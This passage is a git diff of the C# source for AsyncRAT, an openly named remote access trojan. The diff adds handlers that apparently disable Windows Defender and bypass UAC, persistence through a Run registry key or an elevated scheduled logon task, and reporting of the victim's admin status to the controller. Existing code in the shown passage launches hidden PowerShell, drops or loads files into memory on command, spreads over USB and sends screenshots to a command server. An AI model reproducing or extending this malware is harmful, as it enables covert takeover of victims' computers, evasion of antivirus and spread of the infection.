StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = args, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + } + + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 7836bac..eac8782 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -25,35 +25,47 @@ namespace Client.Handle_Packet case "sendMessage": { MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "Ping": { Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "thumbnails": { new HandleGetScreenShot(); + break; } - break; case "sendFile": { Received(); new HandleSendTo().SendToDisk(unpack_msgpack); + break; } - break; case "sendMemory": { Received(); new HandleSendTo().SendToMemory(unpack_msgpack); + break; + } + + case "defender": + { + new HandleWindowsDefender(); + break; + } + + case "uac": + { + new HandleUAC(); + break; } - break; case "close": { @@ -64,8 +76,8 @@ namespace Client.Handle_Packet } catch { } Environment.Exit(0); + break; } - break; case "restart": { @@ -77,14 +89,14 @@ namespace Client.Handle_Packet catch { } Process.Start(Application.ExecutablePath); Environment.Exit(0); + break; } - break; case "uninstall": { new HandleUninstall(); + break; } - break; case "usbSpread": { diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index bdf14dd..0b53413 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -3,6 +3,8 @@ using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; +using System.Security.Principal; +using System.Threading; namespace Client.Install { @@ -29,14 +31,31 @@ namespace Client.Install FileStream fs; if (File.Exists(Settings.ClientFullPath)) + { + File.Delete(Settings.ClientFullPath); + Thread.Sleep(1000); fs = new FileStream(Settings.ClientFullPath, FileMode.Create); + } else fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); fs.Write(clientExe, 0, clientExe.Length); fs.Dispose(); - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/create /sc onlogon /rl highest /tn {Path.GetFileName(Settings.ClientFullPath)} /tr " + "\"" + Settings.ClientFullPath + "\"", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); + } Methods.CloseMutex(); Process.Start(Settings.ClientFullPath); Environment.Exit(0); diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index f9722c6..6cdf390 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -9,7 +9,7 @@ namespace Client { public static string Ports = "6606"; public static string Host = "127.0.0.1"; - public static string Version = "AsyncRAT 0.4.6"; + public static string Version = "AsyncRAT 0.4.7"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string Password = "NYAN CAT"; diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs index a06ca35..582d9f5 100644 --- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs @@ -8,6 +8,7 @@ using System.IO; using System.Net.Sockets; using System.Threading; using System.Text; +using System.Security.Principal; // │ Author : NYAN CAT // │ Name : Nyan Socket v0.1 @@ -80,6 +81,7 @@ namespace Client.Sockets Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit"); msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName; msgpack.ForcePathObject("Version").AsString = Settings.Version; + msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User"); TheCPUCounter.NextValue(); msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%"; return msgpack.Encode2Bytes();